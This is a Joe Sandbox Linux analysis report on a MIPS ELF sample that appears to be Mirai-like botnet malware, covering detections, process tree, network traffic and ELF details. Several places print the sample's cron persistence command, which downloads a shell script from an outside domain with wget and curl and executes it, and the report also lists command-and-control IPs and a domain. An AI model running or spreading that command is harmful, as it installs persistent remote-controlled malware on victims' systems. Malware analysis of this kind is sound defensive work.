Edit tour

Linux Analysis Report
mips.elf

Overview

General Information

Sample name:	mips.elf
Analysis ID:	1542845
MD5:	2bc1855eb4297c28116e412b6705e14a
SHA1:	4d8189399c887b335e1d690961e38b806948d9cd
SHA256:	0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Connects to many ports of the same IP (likely port scanning)

Executes the "crontab" command typically for achieving persistence

Sample tries to persist itself using cron

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Found strings indicative of a multi-platform dropper

Sample has stripped symbol table

Sample listens on a socket

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1542845
Start date and time:	2024-10-26 19:01:27 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	mips.elf
Detection:	MAL
Classification:	mal68.troj.linELF@0/1@19/0

Warnings

VT rate limit hit for: mips.elf

Runtime Messages

Command:	/tmp/mips.elf
PID:	6238
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	you are now apart of hail cock botnet
Standard Error:	no crontab for root

Process Tree

system is lnxubuntu20

mips.elf (PID: 6238, Parent: 6158, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/mips.elf

mips.elf New Fork (PID: 6240, Parent: 6238)

sh (PID: 6240, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

sh New Fork (PID: 6242, Parent: 6240)

sh New Fork (PID: 6244, Parent: 6242)

crontab (PID: 6244, Parent: 6242, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 6243, Parent: 6240)

crontab (PID: 6243, Parent: 6240, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

mips.elf New Fork (PID: 6245, Parent: 6238)

mips.elf New Fork (PID: 6309, Parent: 6245)

mips.elf New Fork (PID: 6311, Parent: 6245)

mips.elf New Fork (PID: 6247, Parent: 6238)

mips.elf New Fork (PID: 6262, Parent: 6238)

cleanup

Yara Signatures

⊘No yara matches

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: mips.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: mips.elf

ReversingLabs: Detection: 15%

Source: tmp.fI62Ih.19.dr

String: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 195.133.92.51 ports 8089,0,1,2,12702,7

Source: global traffic	TCP traffic: 192.168.2.23:42490 -> 185.82.200.181:18483
Source: global traffic	TCP traffic: 192.168.2.23:49654 -> 195.133.92.51:12702
Source: global traffic	TCP traffic: 192.168.2.23:59388 -> 193.233.193.45:2052
Source: global traffic	TCP traffic: 192.168.2.23:44542 -> 86.107.100.80:5854
Source: global traffic	TCP traffic: 192.168.2.23:40288 -> 213.182.204.57:14442
Source: global traffic	TCP traffic: 192.168.2.23:48836 -> 88.151.195.22:7336
Source: global traffic	TCP traffic: 192.168.2.23:38028 -> 194.87.198.29:5090

Source: /tmp/mips.elf (PID: 6238)

Socket: 127.0.0.1:1172

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	UDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknown	UDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknown	UDP traffic detected without corresponding DNS query: 65.21.1.106
Source: unknown	UDP traffic detected without corresponding DNS query: 65.21.1.106
Source: unknown	UDP traffic detected without corresponding DNS query: 65.21.1.106
Source: unknown	UDP traffic detected without corresponding DNS query: 65.21.1.106
Source: unknown	UDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknown	UDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknown	UDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknown	UDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknown	UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown	UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown	UDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknown	UDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknown	UDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknown	UDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknown	UDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknown	UDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknown	UDP traffic detected without corresponding DNS query: 217.160.70.42

Source: global traffic

DNS traffic detected: DNS query: kingstonwikkerink.dyn

Source: tmp.fI62Ih.19.dr

String found in binary or memory: http://hailcocks.ru/wget.sh;

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal68.troj.linELF@0/1@19/0

Persistence and Installation Behavior

Executes the "crontab" command typically for achieving persistence

Source: /bin/sh (PID: 6244)	Crontab executable: /usr/bin/crontab -> crontab -l			Jump to behavior
Source: /bin/sh (PID: 6243)	Crontab executable: /usr/bin/crontab -> crontab -			Jump to behavior

Sample tries to persist itself using cron

Source: /usr/bin/crontab (PID: 6243)	File: /var/spool/cron/crontabs/tmp.fI62Ih			Jump to behavior
Source: /usr/bin/crontab (PID: 6243)	File: /var/spool/cron/crontabs/root			Jump to behavior

Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6384/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6383/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6067/cmdline	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6386/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6385/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6311/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6388/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6387/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6379/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6389/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6380/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6391/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6390/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6382/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6393/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6381/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6392/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6247)	File opened: /proc/6309/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6384/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6383/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6067/cmdline	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6386/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6385/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6388/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6365/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6387/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6379/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6389/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6380/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6391/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6390/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6382/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6393/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6381/status	Jump to behavior
Source: /tmp/mips.elf (PID: 6309)	File opened: /proc/6392/status	Jump to behavior

Source: /tmp/mips.elf (PID: 6240)

Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

Jump to behavior

Source: submitted sample

Stderr: no crontab for root: exit code = 0

Source: /tmp/mips.elf (PID: 6238)

Queries kernel information via 'uname':

Jump to behavior

Source: mips.elf, 6238.1.00005562c5e24000.00005562c5ecc000.rw-.sdmp, mips.elf, 6245.1.00005562c5e24000.00005562c5ecc000.rw-.sdmp	Binary or memory string: bU!/etc/qemu-binfmt/mips
Source: mips.elf, 6238.1.00005562c5e24000.00005562c5ecc000.rw-.sdmp, mips.elf, 6245.1.00005562c5e24000.00005562c5ecc000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: mips.elf, 6238.1.00007ffc99f3c000.00007ffc99f5d000.rw-.sdmp, mips.elf, 6245.1.00007ffc99f3c000.00007ffc99f5d000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/mips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mips.elf
Source: mips.elf, 6238.1.00007ffc99f3c000.00007ffc99f5d000.rw-.sdmp, mips.elf, 6245.1.00007ffc99f3c000.00007ffc99f5d000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	Direct Volume Access	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
mips.elf	16%	ReversingLabs	Linux.Backdoor.Mirai
mips.elf	100%	Avira	EXP/ELF.Agent.J.8

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
kingstonwikkerink.dyn	81.29.149.178	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://hailcocks.ru/wget.sh;	tmp.fI62Ih.19.dr	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.82.200.181	unknown	Netherlands	60117	HSAE	false
213.182.204.57	unknown	Latvia	9009	M247GB	false
194.87.198.29	unknown	Russian Federation	49352	LOGOL-ASRU	false
195.133.92.51	unknown	Russian Federation	197695	AS-REGRU	true
193.233.193.45	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
86.107.100.80	unknown	Romania	38995	AMG-ASRO	false
88.151.195.22	unknown	Azerbaijan	15723	AZERONLINEAZ	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.82.200.181	mpsl.elf	Get hash	malicious	Unknown	Browse
	arm4.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Unknown	Browse
213.182.204.57	hmips.elf	Get hash	malicious	Unknown	Browse
	arm7.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	arm5.elf	Get hash	malicious	Unknown	Browse
	x86.elf	Get hash	malicious	Unknown	Browse
194.87.198.29	ppc.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	arm5.elf	Get hash	malicious	Unknown	Browse
88.151.195.22	hmips.elf	Get hash	malicious	Unknown	Browse
	arm7.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	arm5.elf	Get hash	malicious	Unknown	Browse
195.133.92.51	mips.elf	Get hash	malicious	Unknown	Browse
193.233.193.45	hmips.elf	Get hash	malicious	Unknown	Browse
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
86.107.100.80	arm.elf	Get hash	malicious	Unknown	Browse
86.107.100.80	hmips.elf	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
kingstonwikkerink.dyn	arm.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	hmips.elf	Get hash	malicious	Unknown	Browse	194.87.198.29
	arm7.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	mpsl.elf	Get hash	malicious	Unknown	Browse	81.29.149.178
	ppc.elf	Get hash	malicious	Unknown	Browse	88.151.195.22
	mips.elf	Get hash	malicious	Unknown	Browse	88.151.195.22
	arm5.elf	Get hash	malicious	Unknown	Browse	88.151.195.22
	arm4.elf	Get hash	malicious	Unknown	Browse	88.151.195.22
	x86.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	na.elf	Get hash	malicious	Mirai	Browse	27.102.115.180

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
M247GB	T52Z708x2p.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	91.202.233.141
	lJ4EzPSKMj.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	91.202.233.141
	Us051y7j25.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	91.202.233.141
	thcdVit1dX.exe	Get hash	malicious	Phorpiex	Browse	91.202.233.141
	botnet.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	37.120.192.49
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	77.36.125.19
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	172.94.54.116
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	154.17.88.71
	hmips.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	arm7.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
HSAE	mpsl.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	arm4.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	Copia r#U00e1pida del pago INV 00932024.exe	Get hash	malicious	AgentTesla	Browse	194.36.191.196
	SecuriteInfo.com.Heur.27949.8326.docx	Get hash	malicious	Unknown	Browse	185.82.202.150
	Proforma Invoice NOCAP PLASTIK AMBALA.exe	Get hash	malicious	AgentTesla	Browse	194.36.191.196
	ynwj.ps1	Get hash	malicious	Unknown	Browse	194.36.191.196
	na.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	RFQ SN00954666 for prosjekt CMC 40 fot container.exe	Get hash	malicious	AgentTesla	Browse	194.36.191.196
	i586.elf	Get hash	malicious	Gafgyt, Mirai	Browse	185.82.202.195
	i686.elf	Get hash	malicious	Gafgyt, Mirai	Browse	185.82.202.195
LOGOL-ASRU	ppc.elf	Get hash	malicious	Unknown	Browse	194.87.198.29
	mips.elf	Get hash	malicious	Unknown	Browse	194.87.198.29
	arm5.elf	Get hash	malicious	Unknown	Browse	194.87.198.29
	https://store.microsoft-surface.ru/noutbuki/surface-laptop-5/surface-laptop-5-15/microsoft-surface-laptop-5-15-i7-8gb-512gb-platinum-metal	Get hash	malicious	Unknown	Browse	176.99.5.94
	IISz6QDXkY.elf	Get hash	malicious	Mirai	Browse	176.99.9.164
	file.exe	Get hash	malicious	RedLine	Browse	194.87.191.171
	ilwj2dfs9x.elf	Get hash	malicious	Mirai	Browse	176.99.9.154
	pw4LXxa9IX.elf	Get hash	malicious	Mirai	Browse	176.99.9.130
	dXdP65yVxR.elf	Get hash	malicious	Mirai	Browse	176.99.9.157
	http://www.nnov.org/common/link.php?redir=http://linkedin.com+accounts%3Dsecurelogin+settings%3Dprivate@DOMs.biqscore.com/r/?userid=bGVlLmdpYnNvbkBzb3V0aHNpZGUuY29t	Get hash	malicious	Unknown	Browse	188.93.208.56
AS-REGRU	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	212.24.61.227
	New orde.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	FACTURA A-7507_H1758.exe	Get hash	malicious	GuLoader	Browse	194.58.112.174
	P1 BOL.exe	Get hash	malicious	Unknown	Browse	37.140.192.179
	mips.elf	Get hash	malicious	Unknown	Browse	195.133.92.51
	z10982283782.exe	Get hash	malicious	DBatLoader, FormBook	Browse	194.58.112.174
	Invoice.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.58.112.174
	zamowienie.exe	Get hash	malicious	GuLoader	Browse	194.58.112.174
	#U8a02#U55ae#U63cf#U8ff0.vbs	Get hash	malicious	FormBook	Browse	37.140.192.23

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/var/spool/cron/crontabs/tmp.fI62Ih

Download File

Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	306
Entropy (8bit):	5.1524408008550475
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQIZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJovc:8QjHig8IeHLUHYC+GABjnOGAFkz
MD5:	CB9EF95D1C0FD03589897E771906D58E
SHA1:	0232F02185227C75FA52A60A5A0589D0F973FF2B
SHA-256:	75AA41DE1CB29D6BF2E766C1F822EAB7D58F9955636B980623A7D0C773B31016
SHA-512:	D32D9D0E2D387B558A42A97A15C40D1C12A8E0B023BFA55C57366773B6DD7AADAAD17179EA79F7569CD3C2CD9DC4E8774DA3B828C0853BEE29BF0FCC9F99658E
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Oct 26 12:02:16 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.

Static File Info

General

File type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.5039317921944155
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	mips.elf
File size:	101'564 bytes
MD5:	2bc1855eb4297c28116e412b6705e14a
SHA1:	4d8189399c887b335e1d690961e38b806948d9cd
SHA256:	0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad
SHA512:	1074aa161b94e13c473e8cf23d6bbd6baa531854b4c110b8142ccd8e8296b6a94751e55907f9ed6aff7d1b470676c81ea5754fdfeef14f8829dc9a5e3452d26e
SSDEEP:	1536:uo6JSd6vTfjZ0IonWnP4MmBGSBGxJGSnuqMLHRvMNswe+fYgHIRyyR:upP5ld4MaqMjRUKuYRyyR
TLSH:	43A3C91E6E618FBDF368823447B78E31A35933D627E1C685E26CD6101F6024E585FFA8
File Content Preview:	.ELF.....................@.`...4.........4. ...(.............@...@....}0..}0.................E...E.....(..[.........dt.Q............................<...'..\...!'.......................<...'..8...!... ....'9... ......................<...'......!........'9`

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400260
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	101004
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	13

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x8c	0x0	0x6	AX	4
.text	PROGBITS	0x400120	0x120	0x16020	0x0	0x6	AX	16
.fini	PROGBITS	0x416140	0x16140	0x5c	0x0	0x6	AX	4
.rodata	PROGBITS	0x4161a0	0x161a0	0x1b90	0x0	0x2	A	16
.ctors	PROGBITS	0x458000	0x18000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x458008	0x18008	0x8	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x458014	0x18014	0x10	0x0	0x3	WA	4
.data	PROGBITS	0x458030	0x18030	0x3c8	0x0	0x3	WA	16
.got	PROGBITS	0x458400	0x18400	0x628	0x4	0x10000003	WAp	16
.sbss	NOBITS	0x458a28	0x18a28	0x2c	0x0	0x10000003	WAp	4
.bss	NOBITS	0x458a60	0x18a28	0x5148	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0xcde	0x18a28	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x18a28	0x64	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x17d30	0x17d30	5.5552	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x18000	0x458000	0x458000	0xa28	0x5ba8	3.9060	0x6	RW	0x10000	.ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 19:02:18.236665964 CEST	42490	18483	192.168.2.23	185.82.200.181
Oct 26, 2024 19:02:18.242149115 CEST	18483	42490	185.82.200.181	192.168.2.23
Oct 26, 2024 19:02:18.242252111 CEST	42490	18483	192.168.2.23	185.82.200.181
Oct 26, 2024 19:02:18.265306950 CEST	42490	18483	192.168.2.23	185.82.200.181
Oct 26, 2024 19:02:18.270657063 CEST	18483	42490	185.82.200.181	192.168.2.23
Oct 26, 2024 19:02:18.271310091 CEST	42490	18483	192.168.2.23	185.82.200.181
Oct 26, 2024 19:02:18.276864052 CEST	18483	42490	185.82.200.181	192.168.2.23
Oct 26, 2024 19:02:18.585972071 CEST	42492	18483	192.168.2.23	185.82.200.181
Oct 26, 2024 19:02:18.591593027 CEST	18483	42492	185.82.200.181	192.168.2.23
Oct 26, 2024 19:02:18.591686964 CEST	42492	18483	192.168.2.23	185.82.200.181
Oct 26, 2024 19:02:18.605015039 CEST	42492	18483	192.168.2.23	185.82.200.181
Oct 26, 2024 19:02:18.610577106 CEST	18483	42492	185.82.200.181	192.168.2.23
Oct 26, 2024 19:02:18.611006021 CEST	42492	18483	192.168.2.23	185.82.200.181
Oct 26, 2024 19:02:18.616374969 CEST	18483	42492	185.82.200.181	192.168.2.23
Oct 26, 2024 19:02:20.333534002 CEST	42836	443	192.168.2.23	91.189.91.43
Oct 26, 2024 19:02:20.708473921 CEST	18483	42492	185.82.200.181	192.168.2.23
Oct 26, 2024 19:02:20.708808899 CEST	42492	18483	192.168.2.23	185.82.200.181
Oct 26, 2024 19:02:20.709352016 CEST	18483	42490	185.82.200.181	192.168.2.23
Oct 26, 2024 19:02:20.709961891 CEST	42490	18483	192.168.2.23	185.82.200.181
Oct 26, 2024 19:02:20.714196920 CEST	18483	42492	185.82.200.181	192.168.2.23
Oct 26, 2024 19:02:20.715734959 CEST	18483	42490	185.82.200.181	192.168.2.23
Oct 26, 2024 19:02:21.105412006 CEST	42516	80	192.168.2.23	109.202.202.202
Oct 26, 2024 19:02:25.739476919 CEST	49654	12702	192.168.2.23	195.133.92.51
Oct 26, 2024 19:02:25.741494894 CEST	49656	12702	192.168.2.23	195.133.92.51
Oct 26, 2024 19:02:25.745692015 CEST	12702	49654	195.133.92.51	192.168.2.23
Oct 26, 2024 19:02:25.745814085 CEST	49654	12702	192.168.2.23	195.133.92.51
Oct 26, 2024 19:02:25.745814085 CEST	49654	12702	192.168.2.23	195.133.92.51
Oct 26, 2024 19:02:25.746975899 CEST	12702	49656	195.133.92.51	192.168.2.23
Oct 26, 2024 19:02:25.747056007 CEST	49656	12702	192.168.2.23	195.133.92.51
Oct 26, 2024 19:02:25.747097969 CEST	49656	12702	192.168.2.23	195.133.92.51
Oct 26, 2024 19:02:25.752252102 CEST	12702	49654	195.133.92.51	192.168.2.23
Oct 26, 2024 19:02:25.752321959 CEST	49654	12702	192.168.2.23	195.133.92.51
Oct 26, 2024 19:02:25.752419949 CEST	12702	49656	195.133.92.51	192.168.2.23
Oct 26, 2024 19:02:25.752465010 CEST	49656	12702	192.168.2.23	195.133.92.51
Oct 26, 2024 19:02:25.757664919 CEST	12702	49654	195.133.92.51	192.168.2.23
Oct 26, 2024 19:02:25.757781982 CEST	12702	49656	195.133.92.51	192.168.2.23
Oct 26, 2024 19:02:26.658152103 CEST	12702	49654	195.133.92.51	192.168.2.23
Oct 26, 2024 19:02:26.658240080 CEST	49654	12702	192.168.2.23	195.133.92.51
Oct 26, 2024 19:02:26.658308983 CEST	49654	12702	192.168.2.23	195.133.92.51
Oct 26, 2024 19:02:26.661227942 CEST	12702	49656	195.133.92.51	192.168.2.23
Oct 26, 2024 19:02:26.661295891 CEST	49656	12702	192.168.2.23	195.133.92.51
Oct 26, 2024 19:02:26.661398888 CEST	49656	12702	192.168.2.23	195.133.92.51
Oct 26, 2024 19:02:31.688421965 CEST	59388	2052	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:31.690370083 CEST	59390	2052	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:31.693928003 CEST	2052	59388	193.233.193.45	192.168.2.23
Oct 26, 2024 19:02:31.694034100 CEST	59388	2052	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:31.694034100 CEST	59388	2052	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:31.696036100 CEST	2052	59390	193.233.193.45	192.168.2.23
Oct 26, 2024 19:02:31.696110010 CEST	59390	2052	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:31.696110010 CEST	59390	2052	192.168.2.23	193.233.193.45
Oct 26, 2024 19:02:31.699428082 CEST	2052	59388	193.233.193.45	192.168.2.23
